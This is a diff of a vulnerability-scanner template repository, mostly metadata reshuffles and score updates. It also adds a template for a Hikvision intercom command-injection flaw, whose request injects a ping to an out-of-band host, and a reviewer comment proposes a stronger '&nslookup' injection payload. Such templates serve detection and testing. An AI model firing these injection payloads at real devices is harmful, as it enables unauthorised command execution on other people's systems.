@@ -53,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502205f9aeadd874f5fdf363e87acc0ec34f995e53677d28cbc33b27cf113d9de2b03022100c5b000d74f0180cb372d2dd355622f03e7cb2b5180ac3cb0e6f0660049f49dba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008b0f6a4e144ec0a4f5fb0f772930b5da535472e941723be6c675589ac426a8b5022100bef4cc125a636184009e644aeb5fa64c4a868c49d7c081e63409ed228515e3ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-24223.yaml b/http/cves/2020/CVE-2020-24223.yaml index 3d1b6e45c8..6fa05cc94d 100644 --- a/http/cves/2020/CVE-2020-24223.yaml +++ b/http/cves/2020/CVE-2020-24223.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2020-24223 cwe-id: CWE-79 - epss-score: 0.00976 - epss-percentile: 0.81758 + epss-score: 0.0069 + epss-percentile: 0.79602 cpe: cpe:2.3:a:mara_cms_project:mara_cms:7.5:*:*:*:*:*:*:* metadata: max-request: 1 @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c973b82339421ec3089eac4ceee54851fb8db56c023e4110994b8c16b279307f022100ba5f5c61a9f8acb6755ba89ca34bb684ee60ac4e1e7c96f40f0688789b22e49a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203465eb756d9c1c2a642192e678566a419006885438b5721b7a8b54470650a994022100a3b09f8d55baad75a18b6eb7fab36fd7cf976201304457c717358dd7b6fa2862:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-21805.yaml b/http/cves/2021/CVE-2021-21805.yaml index 39d420c0ea..3ed6b9fc39 100644 --- a/http/cves/2021/CVE-2021-21805.yaml +++ b/http/cves/2021/CVE-2021-21805.yaml 
@@ -14,13 +14,15 @@ info: - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1274 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21805 - https://nvd.nist.gov/vuln/detail/CVE-2021-21805 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-21805 cwe-id: CWE-78 epss-score: 0.97374 - epss-percentile: 0.99892 + epss-percentile: 0.99895 cpe: cpe:2.3:a:advantech:r-seenet:2.4.12:*:*:*:*:*:*:* metadata: verified: true @@ -52,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100f2a3e97b98df27aafb1f8001f577c595d1cbb4fed075db594314502fbf283bd602204b4e9e0d429dacbd3c7672f6fd16118bbc7e73d54077c27d333a19e89ac0f5db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220239da739e577f078def3474254759fb447a0e1c7ae5e5c894fc15f3748b3752b022039afb1da09e145478b68a7981ab742ece2729a5f473a12d97e7c259b4bddafb6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-22873.yaml b/http/cves/2021/CVE-2021-22873.yaml index 65ab692f39..66bb1175d3 100644 --- a/http/cves/2021/CVE-2021-22873.yaml +++ b/http/cves/2021/CVE-2021-22873.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-22873 cwe-id: CWE-601 epss-score: 0.00922 - epss-percentile: 0.81209 + epss-percentile: 0.82474 cpe: cpe:2.3:a:revive-adserver:revive_adserver:*:*:*:*:*:*:*:* metadata: verified: true 
@@ -49,4 +49,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 490a0046304402206825e5ab8251fc139a7b9f7ac5b06687ca56ae1e65ed767ca11c20c7930c7e1f02205a2f6d3c6d66a885a07cd69568accc9951b72dc883ed9cc1f62f561083da2e0c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201f562b389b6a5f97abaafe839123249c8bfc49d20d8cc12c06a61ee23b840795022100e4d6049c15f40c1564d2e55b52873ca91a7030a85feb7605ebf54ce291e513d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24849.yaml b/http/cves/2021/CVE-2021-24849.yaml index a396d3d507..9d11f20664 100644 --- a/http/cves/2021/CVE-2021-24849.yaml +++ b/http/cves/2021/CVE-2021-24849.yaml 
@@ -6,26 +6,26 @@ info: severity: critical description: | The wcfm_ajax_controller AJAX action of the WCFM Marketplace WordPress plugin before 3.4.12, available to unauthenticated and authenticated user, does not properly sanitise multiple parameters before using them in SQL statements, leading to SQL injections. - remediation: Fixed in 3.4.12 reference: - https://wpscan.com/vulnerability/763c08a0-4b2b-4487-b91c-be6cc2b9322e/ - https://nvd.nist.gov/vuln/detail/CVE-2021-24849 - https://wordpress.org/plugins/wc-multivendor-marketplace/ + remediation: Fixed in 3.4.12 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-24849 cwe-id: CWE-89 + cpe: cpe:2.3:a:wclovers:frontend_manager_for_woocommerce_along_with_bookings_subscription_listings_compatible:*:*:*:*:*:wordpress:*:* epss-score: 0.00199 epss-percentile: 0.56492 - cpe: cpe:2.3:a:wclovers:frontend_manager_for_woocommerce_along_with_bookings_subscription_listings_compatible:*:*:*:*:*:wordpress:*:* metadata: - verified: true - max-request: 1 - vendor: wclovers - product: frontend_manager_for_woocommerce_along_with_bookings_subscription_listings_compatible + product: "frontend_manager_for_woocommerce_along_with_bookings_subscription_listings_compatible" framework: wordpress publicwww-query: "/wp-content/plugins/wc-multivendor-marketplace" + verified: true + max-request: 3 + vendor: wclovers tags: wpscan,cve,cve2021,wp,wp-plugin,wordpress,wc-multivendor-marketplace,wpscan,sqli flow: http(1) && http(2) 
@@ -67,4 +67,4 @@ http: - 'contains(header, "application/json")' - 'contains(body, "success")' condition: and -# digest: 4a0a00473045022100ac9faa851954e06269fcb6c1d2c78475a2f575683ef8f476b96450a5671b359102205d7f4ea4de3b3c6db211c706adcd4be8f13de39a9098990f182b0f2008efc79a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ef54cd087054515b6ef2f1935d258ecea55b3abf384cd95798b8cd351a5f1fe90220070a59d1e5a3ab49e8fc248e2ddc238e33958d75f7b3cfc5700b5018b8116f82:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-40651.yaml b/http/cves/2021/CVE-2021-40651.yaml index cac65b9dd7..2fda1838ae 100644 --- a/http/cves/2021/CVE-2021-40651.yaml +++ b/http/cves/2021/CVE-2021-40651.yaml @@ -18,8 +18,8 @@ info: cwe-id: CWE-22 cpe: cpe:2.3:a:os4ed:opensis:8.0:*:*:*:community:*:*:* metadata: - max-request: 1 - shodan-query: title:"openSIS" + shodan-query: "title:\"openSIS\"" + max-request: 2 tags: cve,cve2021,lfi,os4ed,opensis,authenticated http: @@ -42,4 +42,4 @@ http: - 'contains(body_1, "openSIS")' - "status_code == 200" condition: and -# digest: 490a004630440220206394b303ab92ce65590e2c61e6eb5e9914219a5a0651ae69009a3f224109ff02207e729d1c062d3bd2e445a39a036992cc281564407a764e7f7ced5f02879f1034:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100924b4c785059886c8131bde539e1106c1be30952a7fea88bd992cb9cc3e7aca202204c4c3c880b323df6c23378c766e00dd0222716aa49f384cbc8f4c37b7c9ab38f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0776.yaml b/http/cves/2022/CVE-2022-0776.yaml index f5d7062a48..03311a84eb 100644 --- a/http/cves/2022/CVE-2022-0776.yaml +++ b/http/cves/2022/CVE-2022-0776.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-0776 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.40832 + epss-percentile: 0.40075 cpe: cpe:2.3:a:revealjs:reveal.js:*:*:*:*:*:node.js:*:* metadata: vendor: revealjs 
@@ -48,4 +48,4 @@ headless: part: extract words: - "true" -# digest: 4a0a00473045022015776ab1f8ee5f7cbd078059bc34167a0b8ca0a11a1bda34723f7ec03d31b6c302210098d1c6a54ecbafb3158390aea2498590fe70df9d78d3266d388274859a641533:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100822f5151d594a59ff99bde533919eb403ddd05ab8d041ea5963a1c88f81d84320221008c8e17c078665f80ff1f6815e2f071996a8d9e4712b43e3bf775f0c2db3e0e12:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-26263.yaml b/http/cves/2022/CVE-2022-26263.yaml index 1897d2e5e5..eb357ee240 100644 --- a/http/cves/2022/CVE-2022-26263.yaml +++ b/http/cves/2022/CVE-2022-26263.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-26263 cwe-id: CWE-79 epss-score: 0.00147 - epss-percentile: 0.50638 + epss-percentile: 0.49633 cpe: cpe:2.3:a:yonyou:u8\+:13.0:*:*:*:*:*:*:* metadata: verified: true @@ -43,4 +43,4 @@ headless: - '' internal: true -# digest: 490a0046304402205dc4e3489b8db4f6e587d569813f9eec4372432d2ed1350de8d8bc00c7d01a8d02207363f5db9a634f3a0973e7e364948a39da565ec0b5ea0f3ac1276c0fc7027331:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100edda67cd80bdd516aa4f6241fa72a9e1d6c1e240eb1d40d35ae9c44143ff025902206f496f8d850ad284d589527d8abd90bf13aa0414c007dad56d79ba9c57d33c59:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6831.yaml b/http/cves/2023/CVE-2023-6831.yaml index 878750743b..bde88b3ab0 100644 --- a/http/cves/2023/CVE-2023-6831.yaml +++ b/http/cves/2023/CVE-2023-6831.yaml 
@@ -6,25 +6,26 @@ info: severity: high description: | Path Traversal: '\..\filename' in GitHub repository mlflow/mlflow prior to 2.9.2. - remediation: | - Upgrade Mlflow to version 2.9.2 or later to mitigate the vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2023-6831 - https://github.com/mlflow/mlflow/commit/1da75dfcecd4d169e34809ade55748384e8af6c1 - https://huntr.com/bounties/0acdd745-0167-4912-9d5c-02035fe5b314 + remediation: | + Upgrade Mlflow to version 2.9.2 or later to mitigate the vulnerability. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H cvss-score: 8.1 cve-id: CVE-2023-6831 cwe-id: CWE-22 - epss-score: 0.000460000 - epss-percentile: 0.126930000 cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:* + epss-score: 0.00046 + epss-percentile: 0.12693 metadata: - verified: true vendor: lfprojects product: mlflow - shodan-query: http.title:"mlflow" + shodan-query: "http.title:\"mlflow\"" + max-request: 2 + verified: true tags: cve,cve2023,mlflow,pathtraversal,lfprojects http: @@ -58,4 +59,4 @@ http: - type: status status: - 500 -# digest: 490a0046304402202e05b1ca433f0cc3ad8178fa3db634d613c180a5d76bd1907daf5a29b102f02f0220546c974febbb5121e3697cfc1e76620c450e31cee055c94cd0b25375648e38ba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022032f829866528954cdb8ce1c5298787430b08b1d4550ab556b77f078e362da3e102207691a8b5b4639a9faf128176e590b98fc0841775bb6df00b97a7253772fe498a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6895.yaml b/http/cves/2023/CVE-2023-6895.yaml new file mode 100644 index 0000000000..b1fdac14f0 --- /dev/null +++ b/http/cves/2023/CVE-2023-6895.yaml 
@@ -0,0 +1,56 @@
+id: CVE-2023-6895
+
+info:
+ name: Hikvision Intercom Broadcasting System - Command Execution
+ author: archer
+ severity: critical
+ description: |
+ Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE (HIK) version has an operating system command injection vulnerability. The vulnerability originates from the parameter jsondata[ip] in the file /php/ping.php, which can cause operating system command injection.
+ reference:
+ - https://github.com/FuBoLuSec/CVE-2023-6895/blob/main/CVE-2023-6895.py
+ - https://vuldb.com/?ctiid.248254
+ - https://vuldb.com/?id.248254
+ - https://github.com/Marco-zcl/POC
+ - https://github.com/d4n-sec/d4n-sec.github.io
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2023-6895
+ cwe-id: CWE-78
+ epss-score: 0.0008
+ epss-percentile: 0.32716
+ cpe: cpe:2.3:o:hikvision:intercom_broadcast_system:*:*:*:*:*:*:*:*
+ metadata:
+ verified: true
+ max-request: 1
+ vendor: hikvision
+ product: intercom_broadcast_system
+ fofa-query: icon_hash="-1830859634"
+ tags: cve,cve2023,rce,hikvision
+
+http:
+ - raw:
+ - |
+ POST /php/ping.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+ X-Requested-With: XMLHttpRequest
+
+ jsondata%5Btype%5D=99&jsondata%5Bip%5D=ping%20{{interactsh-url}}
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: interactsh_protocol
+ words:
+ - "dns"
+
+ - type: word
+ part: body
+ words:
+ - "TTL="
+
+ - type: status
+ status:
+ - 200
+# digest: 490a00463044022046e9673fbb222a36f6113e7f32e176bc2d800d2a0f8fb0824bc84dd30705c4fa022051992f8ba2020e9c09b574c69ecbca8b48a5d98fda9f790dd46ba0313ebb08bb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-6909.yaml b/http/cves/2023/CVE-2023-6909.yaml
index 577dcf9783..8b4b4a2736 100644
--- a/http/cves/2023/CVE-2023-6909.yaml
+++ b/http/cves/2023/CVE-2023-6909.yaml
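Review bot: The matchers in the `http:` block only establish that the target resolved `{{interactsh-url}}` and returned ping output containing `TTL=`, which is exactly what a correctly working ping utility at `/php/ping.php` would also do when handed a hostname, so unless the endpoint runs `jsondata[ip]` verbatim this fires on intended behaviour as well as on the injection. A payload that separates an innocuous target from an injected command, e.g. `jsondata%5Btype%5D=99&jsondata%5Bip%5D=127.0.0.1%26nslookup%20{{interactsh-url}}`, turns the DNS interaction into proof of execution (a plain ping of 127.0.0.1 never resolves the OOB host), after which the `TTL=` word matcher, which additionally presumes Windows-style ping output, can be dropped; check the referenced PoC for the separator the target honours before changing it. Two smaller points: `fofa-query: icon_hash="-1830859634"` is left as a plain scalar while other templates touched in this commit quote the same kind of value as `"icon_hash=\"…\""`, and the CPE part `o:` denotes an operating system, which looks wrong for a PHP application unless the NVD entry really uses it.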
@@ -6,24 +6,25 @@ info: severity: critical description: | Path Traversal: '\..\filename' in GitHub repository mlflow/mlflow prior to 2.9.2. - impact: | - Successful exploitation could be lead to disclose of sensitive information such as SSH Keys or Internal configurations. - remediation: | - To fix this vulnerability, it is important to update the mlflow package to the latest version 2.10.0. reference: - https://huntr.com/bounties/11209efb-0f84-482f-add0-587ea6b7e850/ - https://nvd.nist.gov/vuln/detail/CVE-2023-6909 - https://github.com/mlflow/mlflow/commit/1da75dfcecd4d169e34809ade55748384e8af6c1 + impact: | + Successful exploitation could be lead to disclose of sensitive information such as SSH Keys or Internal configurations. + remediation: | + To fix this vulnerability, it is important to update the mlflow package to the latest version 2.10.0. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N cvss-score: 9.3 cve-id: CVE-2023-6909 cwe-id: CWE-29 metadata: + max-request: 5 verified: true vendor: lfprojects product: mlflow - shodan-query: http.title:"mlflow" + shodan-query: "http.title:\"mlflow\"" tags: cve,cve2023,mlflow,lfi http: @@ -90,4 +91,4 @@ http: json: - '.run.info.run_id' internal: true -# digest: 4a0a00473045022057cab29fe3d00006c6db44ac420a34cecdad60ef71ae6159d9d1870d61d97420022100cd6d7114a977b54c1190e1a9a7002626d05b41874dccf1e9e5d38cacc7082c6d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100dc4c33652fcf1a1d0dc29690ac81838de82d0c439cc405cb3b0296d4e10cb855022100b3a49f754395ee217ea12cc561be556cc6c3a8da3facee851d5f37fdbab72d61:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-0713.yaml b/http/cves/2024/CVE-2024-0713.yaml index 74459c114b..d52bd7843a 100644 --- a/http/cves/2024/CVE-2024-0713.yaml +++ b/http/cves/2024/CVE-2024-0713.yaml 
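Review bot: The moved `remediation` text tells users to update to "the latest version 2.10.0", while the description a few lines above says the flaw affects mlflow "prior to 2.9.2" and the cited fix commit (1da75dfc…) is the same one CVE-2023-6831.yaml references with a remediation of 2.9.2 or later; the two templates should agree, e.g. `Upgrade mlflow to version 2.9.2 or later to mitigate the vulnerability.` The moved `impact` sentence also has a grammar slip: "could be lead to disclose of sensitive information" should read `Successful exploitation could lead to disclosure of sensitive information such as SSH keys or internal configurations.` The added `max-request: 5` cannot be checked from this hunk, since the template's `http` section lies below it.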
@@ -15,14 +15,15 @@ info: cvss-score: 8.8 cve-id: CVE-2024-0713 cwe-id: CWE-434 + cpe: cpe:2.3:a:monitorr:monitorr:1.7.6m:*:*:*:*:*:*:* epss-score: 0.00061 epss-percentile: 0.2356 - cpe: cpe:2.3:a:monitorr:monitorr:1.7.6m:*:*:*:*:*:*:* metadata: vendor: monitorr product: monitorr verified: true - fofa-query: icon_hash="-211006074" + fofa-query: "icon_hash=\"-211006074\"" + max-request: 2 tags: cve,cve2024,file-upload,intrusive,monitorr variables: @@ -66,4 +67,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502200e99cf7ecbba3a0c88653fc454cb5715d7085e0678ab470e4b7cfbf4dd198e8d022100e47a621b93eaabb8881e48cae80b9cc8c0596a437fc9b8ac0921a63beee74506:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201b9bb4536c3d56e915516c2b0156629ce6f3689a312eddd8d0694b86aa144e1902203d8dccbcbba044b30e6fff72ceb7f66bf40a9bf6f3130c3f3b11b0ec3c30a863:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-1021.yaml b/http/cves/2024/CVE-2024-1021.yaml index 6276be41a5..bdda7021da 100644 --- a/http/cves/2024/CVE-2024-1021.yaml +++ b/http/cves/2024/CVE-2024-1021.yaml 
@@ -6,17 +6,17 @@ info: severity: medium description: | There is a security vulnerability in Rebuild 3.5.5, which is due to a server-side request forgery vulnerability in the URL parameter of the readRawText function of the HTTP Request Handler component. + reference: + - https://github.com/getrebuild/rebuild + - https://nvd.nist.gov/vuln/detail/CVE-2024-1021 impact: | Successful exploitation of this vulnerability can result in unauthorized access to sensitive internal resources. remediation: | Apply the latest security patches or updates provided by Rebuild to fix this vulnerability. - reference: - - https://github.com/getrebuild/rebuild - - https://nvd.nist.gov/vuln/detail/CVE-2024-1021 metadata: - max-request: 1 + max-request: 2 verified: true - fofa-query: icon_hash="871154672" + fofa-query: "icon_hash=\"871154672\"" tags: cve2024,cve,rebuild,ssrf http: @@ -32,4 +32,4 @@ http: - '!contains(body_1, "